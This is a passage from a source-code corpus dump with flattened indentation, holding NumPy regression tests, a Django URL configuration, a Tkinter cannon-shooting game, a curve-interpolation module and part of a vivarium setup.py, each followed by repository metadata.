b = np.array([[(4, 'a'), (1, 'a')], [(2, 'a'), (2, 'a')]], dtype='O,c')
np.dot(a['f0'], b['f0'])
def test_byteswap_complex_scalar(self):
"""Ticket #1259 and gh-441"""
for dtype in [np.dtype('<'+t) for t in np.typecodes['Complex']]:
z = np.array([2.2-1.1j], dtype)
x = z[0] # always native-endian
y = x.byteswap()
if x.dtype.byteorder == z.dtype.byteorder:
# little-endian machine
assert_equal(x, np.fromstring(y.tobytes(), dtype=dtype.newbyteorder()))
else:
# big-endian machine
assert_equal(x, np.fromstring(y.tobytes(), dtype=dtype))
# double check real and imaginary parts:
assert_equal(x.real, y.real.byteswap())
assert_equal(x.imag, y.imag.byteswap())
def test_structured_arrays_with_objects1(self):
"""Ticket #1299"""
stra = 'aaaa'
strb = 'bbbb'
x = np.array([[(0, stra), (1, strb)]], 'i8,O')
x[x.nonzero()] = x.ravel()[:1]
assert_(x[0, 1] == x[0, 0])
def test_structured_arrays_with_objects2(self):
"""Ticket #1299 second test"""
stra = 'aaaa'
strb = 'bbbb'
numb = sys.getrefcount(strb)
numa = sys.getrefcount(stra)
x = np.array([[(0, stra), (1, strb)]], 'i8,O')
x[x.nonzero()] = x.ravel()[:1]
assert_(sys.getrefcount(strb) == numb)
assert_(sys.getrefcount(stra) == numa + 2)
def test_duplicate_title_and_name(self):
"""Ticket #1254"""
def func():
x = np.dtype([(('a', 'a'), 'i'), ('b', 'i')])
self.assertRaises(ValueError, func)
def test_signed_integer_division_overflow(self):
"""Ticket #1317."""
def test_type(t):
min = np.array([np.iinfo(t).min])
min //= -1
with np.errstate(divide="ignore"):
for t in (np.int8, np.int16, np.int32, np.int64, np.int, np.long):
test_type(t)
def test_buffer_hashlib(self):
try:
from hashlib import md5
except ImportError:
from md5 import new as md5
x = np.array([1, 2, 3], dtype=np.dtype('<i4'))
assert_equal(md5(x).hexdigest(), '2a1dd1e1e59d0a384c26951e316cd7e6')
def test_0d_string_scalar(self):
# Bug #1436; the following should succeed
np.asarray('x', '>c')
def test_log1p_compiler_shenanigans(self):
# Check if log1p is behaving on 32 bit intel systems.
assert_(np.isfinite(np.log1p(np.exp2(-53))))
def test_fromiter_comparison(self, level=rlevel):
a = np.fromiter(list(range(10)), dtype='b')
b = np.fromiter(list(range(10)), dtype='B')
assert_(np.alltrue(a == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
assert_(np.alltrue(b == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
def test_fromstring_crash(self):
# Ticket #1345: the following should not cause a crash
np.fromstring(asbytes('aa, aa, 1.0'), sep=',')
def test_ticket_1539(self):
dtypes = [x for x in np.typeDict.values()
if (issubclass(x, np.number)
and not issubclass(x, np.timedelta64))]
a = np.array([], dtypes[0])
failures = []
# ignore complex warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', np.ComplexWarning)
for x in dtypes:
b = a.astype(x)
for y in dtypes:
c = a.astype(y)
try:
np.dot(b, c)
except TypeError as e:
failures.append((x, y))
if failures:
raise AssertionError("Failures: %r" % failures)
def test_ticket_1538(self):
x = np.finfo(np.float32)
for name in 'eps epsneg max min resolution tiny'.split():
assert_equal(type(getattr(x, name)), np.float32,
err_msg=name)
def test_ticket_1434(self):
# Check that the out= argument in var and std has an effect
data = np.array(((1, 2, 3), (4, 5, 6), (7, 8, 9)))
out = np.zeros((3,))
ret = data.var(axis=1, out=out)
assert_(ret is out)
assert_array_equal(ret, data.var(axis=1))
ret = data.std(axis=1, out=out)
assert_(ret is out)
assert_array_equal(ret, data.std(axis=1))
def test_complex_nan_maximum(self):
cnan = complex(0, np.nan)
assert_equal(np.maximum(1, cnan), cnan)
def test_subclass_int_tuple_assignment(self):
# ticket #1563
class Subclass(np.ndarray):
def __new__(cls, i):
return np.ones((i,)).view(cls)
x = Subclass(5)
x[(0,)] = 2 # shouldn't raise an exception
assert_equal(x[0], 2)
def test_ufunc_no_unnecessary_views(self):
# ticket #1548
class Subclass(np.ndarray):
pass
x = np.array([1, 2, 3]).view(Subclass)
y = np.add(x, x, x)
assert_equal(id(x), id(y))
def test_take_refcount(self):
# ticket #939
a = np.arange(16, dtype=np.float)
a.shape = (4, 4)
lut = np.ones((5 + 3, 4), np.float)
rgba = np.empty(shape=a.shape + (4,), dtype=lut.dtype)
c1 = sys.getrefcount(rgba)
try:
lut.take(a, axis=0, mode='clip', out=rgba)
except TypeError:
pass
c2 = sys.getrefcount(rgba)
assert_equal(c1, c2)
def test_fromfile_tofile_seeks(self):
# On Python 3, tofile/fromfile used to get (#1610) the Python
# file handle out of sync
f0 = tempfile.NamedTemporaryFile()
f = f0.file
f.write(np.arange(255, dtype='u1').tobytes())
f.seek(20)
ret = np.fromfile(f, count=4, dtype='u1')
assert_equal(ret, np.array([20, 21, 22, 23], dtype='u1'))
assert_equal(f.tell(), 24)
f.seek(40)
np.array([1, 2, 3], dtype='u1').tofile(f)
assert_equal(f.tell(), 43)
f.seek(40)
data = f.read(3)
assert_equal(data, asbytes("\x01\x02\x03"))
f.seek(80)
f.read(4)
data = np.fromfile(f, dtype='u1', count=4)
assert_equal(data, np.array([84, 85, 86, 87], dtype='u1'))
f.close()
def test_complex_scalar_warning(self):
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = tp(1+2j)
assert_warns(np.ComplexWarning, float, x)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
assert_equal(float(x), float(x.real))
def test_complex_scalar_complex_cast(self):
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = tp(1+2j)
assert_equal(complex(x), 1+2j)
def test_complex_boolean_cast(self):
"""Ticket #2218"""
for tp in [np.csingle, np.cdouble, np.clongdouble]:
x = np.array([0, 0+0.5j, 0.5+0j], dtype=tp)
assert_equal(x.astype(bool), np.array([0, 1, 1], dtype=bool))
assert_(np.any(x))
assert_(np.all(x[1:]))
def test_uint_int_conversion(self):
x = 2**64 - 1
assert_equal(int(np.uint64(x)), x)
def test_duplicate_field_names_assign(self):
ra = np.fromiter(((i*3, i*2) for i in range(10)), dtype='i8,f8')
ra.dtype.names = ('f1', 'f2')
rep = repr(ra) # should not cause a segmentation fault
assert_raises(ValueError, setattr, ra.dtype, 'names', ('f1', 'f1'))
def test_eq_string_and_object_array(self):
# From e-mail thread "__eq__ with str and object" (Keith Goodman)
a1 = np.array(['a', 'b'], dtype=object)
a2 = np.array(['a', 'c'])
assert_array_equal(a1 == a2, [True, False])
assert_array_equal(a2 == a1, [True, False])
def test_nonzero_byteswap(self):
a = np.array([0x80000000, 0x00000080, 0], dtype=np.uint32)
a.dtype = np.float32
assert_equal(a.nonzero()[0], [1])
a = a.byteswap().newbyteorder()
assert_equal(a.nonzero()[0], [1]) # [0] if nonzero() ignores swap
def test_find_common_type_boolean(self):
# Ticket #1695
assert_(np.find_common_type([], ['?', '?']) == '?')
def test_empty_mul(self):
a = np.array([1.])
a[1:1] *= 2
assert_equal(a, [1.])
def test_array_side_effect(self):
assert_equal(np.dtype('S10').itemsize, 10)
A = np.array([['abc', 2], ['long ', '0123456789']], dtype=np.string_)
# This was throwing an exception because in ctors.c,
# discover_itemsize was calling PyObject_Length without checking
# the return code. This failed to get the length of the number 2,
# and the exception hung around until something checked
# PyErr_Occurred() and returned an error.
assert_equal(np.dtype('S10').itemsize, 10)
def test_any_float(self):
# all and any for floats
a = np.array([0.1, 0.9])
assert_(np.any(a))
assert_(np.all(a))
def test_large_float_sum(self):
a = np.arange(10000, dtype='f')
assert_equal(a.sum(dtype='d'), a.astype('d').sum())
def test_ufunc_casting_out(self):
a = np.array(1.0, dtype=np.float32)
b = np.array(1.0, dtype=np.float64)
c = np.array(1.0, dtype=np.float32)
np.add(a, b, out=c)
assert_equal(c, 2.0)
def test_array_scalar_contiguous(self):
# Array scalars are both C and Fortran contiguous
assert_(np.array(1.0).flags.c_contiguous)
assert_(np.array(1.0).flags.f_contiguous)
assert_(np.array(np.float32(1.0)).flags.c_contiguous)
assert_(np.array(np.float32(1.0)).flags.f_contiguous)
def test_squeeze_contiguous(self):
"""Similar to GitHub issue #387"""
a = np.zeros((1, 2)).squeeze()
b = np.zeros((2, 2, 2), order='F')[:,:, ::2].squeeze()
assert_(a.flags.c_contiguous)
assert_(a.flags.f_contiguous)
assert_(b.flags.f_contiguous)
def test_reduce_contiguous(self):
"""GitHub issue #387"""
a = np.add.reduce(np.zeros((2, 1, 2)), (0, 1))
b = np.add.reduce(np.zeros((2, 1, 2)), 1)
assert_(a.flags.c_contiguous)
assert_(a.flags.f_contiguous)
assert_(b.flags.c_contiguous)
def test_object_array_self_reference(self):
# Object arrays with references to themselves can cause problems
a = np.array(0, dtype=object)
a[()] = a
assert_raises(TypeError, int, a)
assert_raises(TypeError, long, a)
assert_raises(TypeError, float, a)
assert_raises(TypeError, oct, a)
assert_raises(TypeError, hex, a)
# Test the same for a circular reference.
b = np.array(a, dtype=object)
a[()] = b
assert_raises(TypeError, int, a)
# Numpy has no tp_traverse currently, so circular references
# cannot be detected. So resolve it:
a[()] = 0
# This was causing a to become like the above
a = np.array(0, dtype=object)
a[...] += 1
assert_equal(a, 1)
def test_object_array_self_copy(self):
# An object array being copied into itself DECREF'ed before INCREF'ing
# causing segmentation faults (gh-3787)
a = np.array(object(), dtype=object)
np.copyto(a, a)
assert_equal(sys.getrefcount(a[()]), 2)
a[()].__class__ # will segfault if object was deleted
def test_zerosize_accumulate(self):
"Ticket #1733"
x = np.array([[42, 0]], dtype=np.uint32)
assert_equal(np.add.accumulate(x[:-1, 0]), [])
def test_objectarray_setfield(self):
# Setfield directly manipulates the raw array data,
# so is invalid for object arrays.
x = np.array([1, 2, 3], dtype=object)
assert_raises(RuntimeError, x.setfield, 4, np.int32, 0)
def test_setting_rank0_string(self):
"Ticket #1736"
s1 = asbytes("hello1")
s2 = asbytes("hello2")
a = np.zeros((), dtype="S10")
a[()] = s1
assert_equal(a, np.array(s1))
a[()] = np.array(s2)
assert_equal(a, np.array(s2))
a = np.zeros((), dtype='f4')
a[()] = 3
assert_equal(a, np.array(3))
a[()] = np.array(4)
assert_equal(a, np.array(4))
def test_string_astype(self):
"Ticket #1748"
s1 = asbytes('black')
s2 = asbytes('white')
s3 = asbytes('other')
a = np.array([[s1], [s2], [s3]])
assert_equal(a.dtype, np.dtype('S5'))
b = a.astype(np.dtype('S0'))
assert_equal(b.dtype, np.dtype('S5'))
def test_ticket_1756(self):
"""Ticket #1756 """
s = asbytes('0123456789abcdef')
a = np.array([s]*5)
for i in range(1, 17):
a1 = np.array(a, "|S%d"%i)
a2 = np.array([s[:i]]*5)
assert_equal(a1, a2)
def test_fields_strides(self):
"Ticket #1760"
r=np.fromstring('abcdefghijklmnop'*4*3, dtype='i4,(2,3)u2')
assert_equal(r[0:3:2]['f1'], r['f1'][0:3:2])
assert_equal(r[0:3:2]['f1'][0], r[0:3:2][0]['f1'])
assert_equal(r[0:3:2]['f1'][0][()], r[0:3:2][0]['f1'][()])
assert_equal(r[0:3:2]['f1'][0].strides, r[0:3:2][0]['f1'].strides)
def test_alignment_update(self):
"""Check that alignment flag is updated on stride setting"""
a = np.arange(10)
assert_(a.flags.aligned)
a.strides = 3
assert_(not a.flags.aligned)
def test_ticket_1770(self):
"Should not segfault on python 3k"
import numpy as np
try:
a = np.zeros((1,), dtype=[('f1', 'f')])
a['f1'] = 1
a['f2'] = 1
except ValueError:
pass
except:
raise AssertionError
def test_ticket_1608(self):
"x.flat shouldn't modify data"
x = np.array([[1, 2], [3, 4]]).T
y = np.array(x.flat)
assert_equal(x, [[1, 3], [2, 4]])
def test_pickle_string_overwrite(self):
import re
data = np.array([1], dtype='b')
blob = pickle.dumps(data, protocol=1)
data = pickle.loads(blob)
# Check that loads does not clobber interned strings
s = re.sub("a(.)", "\x01\\1", "a_")
assert_equal(s[0], "\x01")
data[0] = 0xbb
s = re.sub("a(.)", "\x01\\1", "a_")
assert_equal(s[0], "\x01")
def test_pickle_bytes_overwrite(self):
if sys.version_info[0] >= 3:
data = np.array([1], dtype='b')
data = pickle.loads(pickle.dumps(data))
data[0] = 0xdd
bytestring = "\x01 ".encode('ascii')
assert_equal(bytestring[0:1], '\x01'.encode('ascii'))
def test_structured_type_to_object(self):
a_rec = np.array([(0, 1), (3, 2)], dtype='i4,i8')
a_obj = np.empty((2,), dtype=object)
a_obj[0] = (0, 1)
a_obj[1] = (3, 2)
# astype records -> object
assert_equal(a_rec.astype(object), a_obj)
# '=' records -> object
b = np.empty_like(a_obj)
b[...] = a_rec
assert_equal(b, a_obj)
# '=' object -> records
b = np.empty_like(a_rec)
b[...] = a_obj
assert_equal(b, a_rec)
def test_assign_obj_listoflists(self):
# Ticket # 1870
# The inner list should get assigned to the object elements
a = np.zeros(4, dtype=object)
b = a.copy()
a[0] = [1]
a[1] = [2]
a[2] = [3]
a[3] = [4]
b[...] = [[1], [2], [3], [4]]
assert_equal(a, b)
# The first dimension should get broadcast
a = np.zeros((2, 2), dtype=object)
a[...] = [[1, 2]]
assert_equal(a, [[1, 2], [1, 2]])
def test_memoryleak(self):
# Ticket #1917 - ensure that array data doesn't leak
for i in range(1000):
# 100MB times 1000 would give 100GB of memory usage if it leaks
a = np.empty((100000000,), dtype='i1')
del a
def test_ufunc_reduce_memoryleak(self):
a = np.arange(6)
acnt = sys.getrefcount(a)
res = np.add.reduce(a)
assert_equal(sys.getrefcount(a), acnt)
def test_search_sorted_invalid_arguments(self):
# Ticket #2021, should not segfault.
x = np.arange(0, 4, dtype='datetime64[D]')
assert_raises(TypeError, x.searchsorted, 1)
def test_string_truncation(self):
# Ticket #1990 - Data can be truncated in creation of an array from a
# mixed sequence of numeric values and strings
for val in [True, 1234, 123.4, complex(1, 234)]:
for tostr in [asunicode, asbytes]:
b = np.array([val, tostr('xx')])
assert_equal(tostr(b[0]), tostr(val))
b = np.array([tostr('xx'), val])
assert_equal(tostr(b[1]), tostr(val))
# test also with longer strings
b = np.array([val, tostr('xxxxxxxxxx')])
assert_equal(tostr(b[0]), tostr(val))
b = np.array([tostr('xxxxxxxxxx'), val])
assert_equal(tostr(b[1]), tostr(val))
def test_string_truncation_ucs2(self):
# Ticket #2081. Python compiled with two byte unicode
# can lead to truncation if itemsize is not properly
# adjusted for Numpy's four byte unicode.
if sys.version_info[0] >= 3:
a = np.array(['abcd'])
else:
a = np.array([sixu('abcd')])
assert_equal(a.dtype.itemsize, 16)
def test_unique_stable(self):
# Ticket #2063 must always choose stable sort for argsort to
# get consistent results
v = np.array(([0]*5 + [1]*6 + [2]*6)*4)
res = np.unique(v, return_index=True)
tgt = (np.array([0, 1, 2]), np.array([ 0, 5, 11]))
assert_equal(res, tgt)
def test_unicode_alloc_dealloc_match(self):
# Ticket #1578, the mismatch only showed up when running
# python-debug for python versions >= 2.7, and then as
# a core dump and error message.
a = np.array(['abc'], dtype=np.unicode)[0]
del a
def test_refcount_error_in_clip(self):
# Ticket #1588
a = np.zeros((2,), dtype='>i2').clip(min=0)
x = a + a
# This used to segfault:
y = str(x)
# Check the final string:
assert_(y == "[0 0]")
def test_searchsorted_wrong_dtype(self):
# Ticket #2189, it used to segfault, so we check that it raises the
# proper exception.
a = np.array([('a', 1)], dtype='S1, int')
assert_raises(TypeError, np.searchsorted, a, 1.2)
# Ticket #2066, similar problem:
dtype = np.format_parser(['i4', 'i4'], [], [])
a = np.recarray((2, ), dtype)
assert_raises(TypeError, np.searchsorted, a, 1)
def test_complex64_alignment(self):
# Issue gh-2668 (trac 2076), segfault on sparc due to misalignment
dtt = np.complex64
arr = np.arange(10, dtype=dtt)
# 2D array
arr2 = np.reshape(arr, (2, 5))
# Fortran write followed by (C or F) read caused bus error
data_str = arr2.tobytes('F')
data_back = np.ndarray(arr2.shape,
arr2.dtype,
buffer=data_str,
order='F')
assert_array_equal(arr2, data_back)
def test_structured_count_nonzero(self):
arr = np.array([0, 1]).astype('i4, (2)i4')[:1]
count = np.count_nonzero(arr)
assert_equal(count, 0)
def test_copymodule_preserves_f_contiguity(self):
a = np.empty((2, 2), order='F')
b = copy.copy(a)
c = copy.deepcopy(a)
assert_(b.flags.fortran)
assert_(b.flags.f_contiguous)
assert_(c.flags.fortran)
assert_(c.flags.f_contiguous)
def test_fortran_order_buffer(self):
import numpy as np
a = np.array([['Hello', 'Foob']], dtype='U5', order='F')
arr = np.ndarray(shape=[1, 2, 5], dtype='U1', buffer=a)
arr2 = np.array([[[sixu('H'), sixu('e'), sixu('l'), sixu('l'), sixu('o')],
[sixu('F'), sixu('o'), sixu('o'), sixu('b'), sixu('')]]])
assert_array_equal(arr, arr2)
def test_assign_from_sequence_error(self):
# Ticket #4024.
arr = np.array([1, 2, 3])
assert_raises(ValueError, arr.__setitem__, slice(None), [9, 9])
arr.__setitem__(slice(None), [9])
assert_equal(arr, [9, 9, 9])
def test_format_on_flex_array_element(self):
# Ticket #4369.
dt = np.dtype([('date', '<M8[D]'), ('val', '<f8')])
arr = np.array([('2000-01-01', 1)], dt)
formatted = '{0}'.format(arr[0])
assert_equal(formatted, str(arr[0]))
def test_deepcopy_on_0d_array(self):
# Ticket #3311.
arr = np.array(3)
arr_cp = copy.deepcopy(arr)
assert_equal(arr, arr_cp)
assert_equal(arr.shape, arr_cp.shape)
assert_equal(int(arr), int(arr_cp))
self.assertTrue(arr is not arr_cp)
self.assertTrue(isinstance(arr_cp, type(arr)))
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | -5,638,932,061,150,603,000 | 34.939055 | 92 | 0.525974 | false |
yabirgb/caucab | src/urls.py | 1 | 1654 | """src URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
import social.views
from django.core.urlresolvers import reverse_lazy
from django.contrib.auth.views import login, logout
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', social.views.home, name = "home"),
url(r'^circle/(?P<circle_id>[\w-]+)$', view=social.views.circle),
url(r'^u/(?P<username>[\w-]+)$', view=social.views.profile),
url(r'^me/$', view=social.views.profile, name='profile'),
url(r'^publish/$', view=social.views.publish, name='publish'),
url(r'^notifications/$', view=social.views.notifications, name='notifications'),
url(r'^login/$', login,{"template_name" : "login.html",},name="login"),
# Map the 'django.contrib.auth.views.logout' view to the /logout/ URL.
# Pass additional parameters to the view like the page to show after logout
# via a dictionary used as the 3rd argument.
url(r'^logout/$', logout,{"next_page" : reverse_lazy('login')}, name="logout"),
]
| mit | -8,059,594,152,844,142,000 | 42.526316 | 84 | 0.679565 | false |
widowild/messcripts | exercice/python2/chap18/canon_cible_after.py | 1 | 7820 | # -*- coding:Latin-1 -*-
#####################################
# Bombardment of a moving target    #
# (C) G. Swinnen - April 2004 - GPL #
#####################################
from Tkinter import *
from math import sin, cos, pi
from random import randrange
from threading import Thread
class Canon:
    """Small graphical cannon"""
def __init__(self, boss, num, x, y, sens):
        self.boss = boss # canvas reference
        self.num = num # cannon number in the list
        self.x1, self.y1 = x, y # cannon rotation axis
        self.sens = sens # firing direction (-1: left, +1: right)
        self.lbu = 30 # barrel length
        # draw the cannon barrel (horizontal):
self.x2, self.y2 = x + self.lbu * sens, y
self.buse = boss.create_line(self.x1, self.y1,
self.x2, self.y2, width =10)
        # draw the cannon body (colored circle):
        self.rc = 15 # circle radius
self.corps = boss.create_oval(x -self.rc, y -self.rc, x +self.rc,
y +self.rc, fill ='black')
        # pre-draw a shell (at first it is just a point):
self.obus = boss.create_oval(x, y, x, y, fill='red')
self.anim = 0
        # get the canvas width and height:
self.xMax = int(boss.cget('width'))
self.yMax = int(boss.cget('height'))
    def orienter(self, angle):
        "set the elevation of the cannon"
        # note: the <angle> parameter is received as a string,
        # so it must be converted to a float, then to radians:
self.angle = float(angle)*2*pi/360
self.x2 = self.x1 + self.lbu * cos(self.angle) * self.sens
self.y2 = self.y1 - self.lbu * sin(self.angle)
self.boss.coords(self.buse, self.x1, self.y1, self.x2, self.y2)
    def feu(self):
        "fire a shell"
        # reference of the target object:
self.cible = self.boss.master.cible
if self.anim ==0:
self.anim =1
            # starting position of the shell (the muzzle of the cannon):
            self.xo, self.yo = self.x2, self.y2
            v = 20 # initial speed
            # vertical and horizontal components of that speed:
self.vy = -v *sin(self.angle)
self.vx = v *cos(self.angle) *self.sens
self.animer_obus()
    def animer_obus(self):
        "animate the shell (ballistic trajectory)"
        # position the shell by re-defining its coordinates:
self.boss.coords(self.obus, self.xo -3, self.yo -3,
self.xo +3, self.yo +3)
if self.anim >0:
            # compute the next position:
            self.xo += self.vx
            self.yo += self.vy
            self.vy += .5 # gravity: the vertical speed increases a little on each frame
            self.test_obstacle() # did we hit an obstacle?
self.boss.after(15, self.animer_obus)
else:
            # end of the animation:
self.boss.coords(self.obus, self.x1, self.y1, self.x1, self.y1)
    def test_obstacle(self):
        "check whether the shell reached a target or the limits of the game"
if self.yo >self.yMax or self.xo <0 or self.xo >self.xMax:
self.anim =0
return
if self.yo > self.cible.y -3 and self.yo < self.cible.y +18 \
and self.xo > self.cible.x -3 and self.xo < self.cible.x +43:
            # draw the explosion of the shell (orange circle):
self.explo = self.boss.create_oval(self.xo -10,
self.yo -10, self.xo +10, self.yo +10,
fill ='orange', width =0)
self.boss.after(150, self.fin_explosion)
self.anim =0
    def fin_explosion(self):
        "erase the explosion circle - handle the score"
        self.boss.delete(self.explo)
        # report the hit to the master window:
self.boss.master.goal()
class Pupitre(Frame):
    """Aiming console associated with a cannon"""
def __init__(self, boss, canon):
Frame.__init__(self, bd =3, relief =GROOVE)
self.score =0
s =Scale(self, from_ =88, to =65,
troughcolor ='dark grey',
command =canon.orienter)
        s.set(45) # initial firing angle
s.pack(side =LEFT)
Label(self, text ='Hausse').pack(side =TOP, anchor =W, pady =5)
Button(self, text ='Feu !', command =canon.feu).\
pack(side =BOTTOM, padx =5, pady =5)
Label(self, text ="points").pack()
self.points =Label(self, text=' 0 ', bg ='white')
self.points.pack()
        # place it on the left or the right depending on the cannon direction:
gd =(LEFT, RIGHT)[canon.sens == -1]
self.pack(padx =3, pady =5, side =gd)
    def attribuerPoint(self, p):
        "increase or decrease the score"
self.score += p
self.points.config(text = ' %s ' % self.score)
class Cible:
    """graphical object used as a target"""
def __init__(self, can, x, y):
        self.can = can # canvas reference
self.x, self.y = x, y
self.cible = can.create_oval(x, y, x+40, y+15, fill ='purple')
    def deplacer(self, dx, dy):
        "move the target by dx,dy"
self.can.move(self.cible, dx, dy)
self.x += dx
self.y += dy
return self.x, self.y
class Thread_cible(Thread):
    """thread object driving the animation of the target"""
def __init__(self, app, cible):
Thread.__init__(self)
        self.cible = cible # object to move
        self.app = app # ref. of the application window
        self.sx, self.sy = 6, 3 # space increments and
        self.dt =300 # time step for the animation (ms)
    def run(self):
        "animate as long as the application window exists"
x, y = self.cible.deplacer(self.sx, self.sy)
if x > self.app.xm -50 or x < self.app.xm /5:
self.sx = -self.sx
if y < self.app.ym /2 or y > self.app.ym -20:
self.sy = -self.sy
if self.app != None:
self.app.after(int(self.dt), self.run)
    def stop(self):
        "stop the thread when the application window is closed"
self.app =None
    def accelere(self):
        "speed up the movement"
self.dt /= 1.5
self.app.bell()
class Application(Frame):
def __init__(self):
Frame.__init__(self)
self.master.title('<<< Tir sur cible mobile >>>')
self.pack()
self.xm, self.ym = 600, 500
self.jeu = Canvas(self, width =self.xm, height =self.ym,
bg ='ivory', bd =3, relief =SUNKEN)
self.jeu.pack(padx =4, pady =4, side =TOP)
        # Instantiate a cannon and an aiming console:
x, y = 30, self.ym -20
self.gun =Canon(self.jeu, 1, x, y, 1)
self.pup =Pupitre(self, self.gun)
        # instantiate the moving target:
self.cible = Cible(self.jeu, self.xm/2, self.ym -25)
        # animate the moving target on its own thread:
self.tc = Thread_cible(self, self.cible)
self.tc.start()
        # stop all threads when the window is closed:
self.bind('<Destroy>',self.fermer_threads)
    def goal(self):
        "the target has been hit"
self.pup.attribuerPoint(1)
self.tc.accelere()
    def fermer_threads(self, evt):
        "stop the target animation thread"
self.tc.stop()
if __name__ =='__main__':
Application().mainloop()
| gpl-3.0 | 7,332,927,941,599,991,000 | 39.102564 | 79 | 0.534015 | false |
rasmadeus/Equre | src/equre/equre.py | 1 | 5197 | # -*- coding: utf-8 -*-
__author__="rasmadeus"
__date__ ="$14.10.2014 20:00:10$"
class EqurePoint:
def __init__(self, x, y, value):
self._x = x
self._y = y
self._value = value
def x(self):
return self._x
def y(self):
return self._y
def value(self):
return self._value
def interpolate(self, point, value):
"""
>>> point1 = EqurePoint(0.0, 10.0, 10.0)
>>> point1.interpolate(EqurePoint(10.0, 0.0, 0.0), 5.0)
(5.0, 5.0)
>>> point1.interpolate(EqurePoint(10.0, 0.0, 10.0), 10.0)
(5.0, 5.0)
"""
import math
length = point._value - self._value
k_of_value = 0.5 if (length == 0) else (value - self._value) / length
x_of_value = self._x + k_of_value * (point._x - self._x)
y_of_value = self._y + k_of_value * (point._y - self._y)
return (x_of_value, y_of_value)
@staticmethod
def make_from(line_of_file):
"""
>>> line = '45 34 12'
>>> point = EqurePoint.make_from(line)
>>> point.value()
12.0
>>> line = '23'
>>> point = EqurePoint.make_from(line)
>>> point.value()
0.0
>>> point.x()
23.0
"""
def get_value(values, i):
try:
return float(values[i])
except:
return 0.0
values = line_of_file.split()
if len(values) == 0:
raise Exception('line of file is empty')
return EqurePoint(get_value(values, 0), get_value(values, 1), get_value(values, 2))
class EqureCurve:
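    """Holds EqurePoint objects sorted by their value and interpolates between
    them to build equal-value (iso) curves."""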
def __init__(self):
self.clear()
def clear(self):
self._points = []
def values(self):
return [point.value() for point in self._points]
def count(self):
return len(self._points)
def point(self, i):
return self._points[i]
def append(self, x, y, value):
"""
>>> curve = EqureCurve()
>>> curve.append(1, 2, 0)
>>> curve.append(2, 4, -1)
>>> curve.append(4, 1, 4)
>>> print(curve.values())
[-1, 0, 4]
"""
self._append(EqurePoint(x, y, value))
self._sort()
def _sort(self):
self._points.sort(key=lambda point: point.value())
def _append(self, equre_curve):
self._points.append(equre_curve)
def fill_from(self, path_to_file):
"""
>>> path_to_test_file = './/test_data//equre_points.txt'
>>> curve = EqureCurve()
>>> curve.fill_from(path_to_test_file)
>>> curve.values()
[-23.2, -23.0, 0.0, 0.0, 2.0, 34.0]
"""
for line_of_file in open(path_to_file, 'r'):
try:
point = EqurePoint.make_from(line_of_file)
self._append(point)
except:
pass
self._sort()
def make_equal_curve_for(self, value):
"""
>>> equre_curve = EqureCurve()
>>> equre_curve.append(0.0, 10.0, 10.0)
>>> equre_curve.append(10.0, 0.0, 0.0)
>>> equre_curve.make_equal_curve_for(5.0)
[(5.0, 5.0)]
>>> equre_curve.append(5.0, 1.0, 5.0)
>>> equre_curve.append(15.0, 7.0, 6.0)
>>> equre_curve.make_equal_curve_for(5.0)
[(5.0, 1.0), (5.0, 1.0), (5.0, 1.0), (5.0, 1.0), (5.0, 5.0), (14.166666666666668, 5.833333333333334)]
"""
curve = []
for i in range(self.count()):
if self.point(i).value() <= value:
for j in range(i, self.count(), 1):
if self.point(j).value() >= value:
curve.append(self.point(i).interpolate(self.point(j), value))
curve.sort(key=lambda xy: xy[1])
return curve
def make_equals_curves_for(self, begin_value, step):
"""
>>> equre_curve = EqureCurve()
>>> equre_curve.append(0.0, 10.0, 10.0)
>>> equre_curve.append(10.0, 0.0, 0.0)
>>> equre_curve.make_equals_curves_for(0.0, 5.0)
{0.0: [(10.0, 0.0), (10.0, 0.0)], 10.0: [(0.0, 10.0), (0.0, 10.0)], 5.0: [(5.0, 5.0)]}
"""
curves = {}
current_value = begin_value
last_value = self.point(self.count() - 1).value()
while current_value <= last_value:
curve = self.make_equal_curve_for(current_value)
if len(curve) != 0:
curves[current_value] = curve
current_value += step
return curves
def make_out_files(self, begin_value, step, out_files_dir):
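        # Writes one tab-separated text file per iso-value level ('<value>.txt' inside
        # out_files_dir), each with an 'X,km'/'H,km' header followed by the curve points.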
curves = self.make_equals_curves_for(begin_value, step)
for value, curve in curves.iteritems():
from os import path
out_file = open(path.join(out_files_dir, '{value}.txt'.format(value=value)), 'w')
out_file.write(u'X,km\tH,km\n')
for xh in curve:
out_file.write('{x}\t{h}\n'.format(x=xh[0], h=xh[1]))
| gpl-2.0 | 3,393,329,533,278,369,300 | 30.125749 | 109 | 0.469694 | false |
ihmeuw/vivarium | setup.py | 1 | 2877 | from pathlib import Path
from setuptools import setup, find_packages
if __name__ == "__main__":
base_dir = Path(__file__).parent
src_dir = base_dir / 'src'
about = {}
with (src_dir / "vivarium" / "__about__.py").open() as f:
exec(f.read(), about)
with (base_dir / "README.rst").open() as f:
long_description = f.read()
install_requirements = [
'numpy',
'pandas',
'pyyaml>=5.1',
'scipy',
'click',
'tables',
'networkx',
'loguru',
]
interactive_requirements = [
'IPython',
'ipywidgets',
'jupyter',
]
test_requirements = [
'pytest',
'pytest-mock',
]
doc_requirements = [
'sphinx>=4.0',
'sphinx-rtd-theme',
'sphinx-click',
'IPython',
'matplotlib'
]
setup(
name=about['__title__'],
version=about['__version__'],
description=about['__summary__'],
long_description=long_description,
license=about['__license__'],
url=about["__uri__"],
author=about["__author__"],
author_email=about["__email__"],
classifiers=[
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)",
"Natural Language :: English",
"Operating System :: MacOS :: MacOS X",
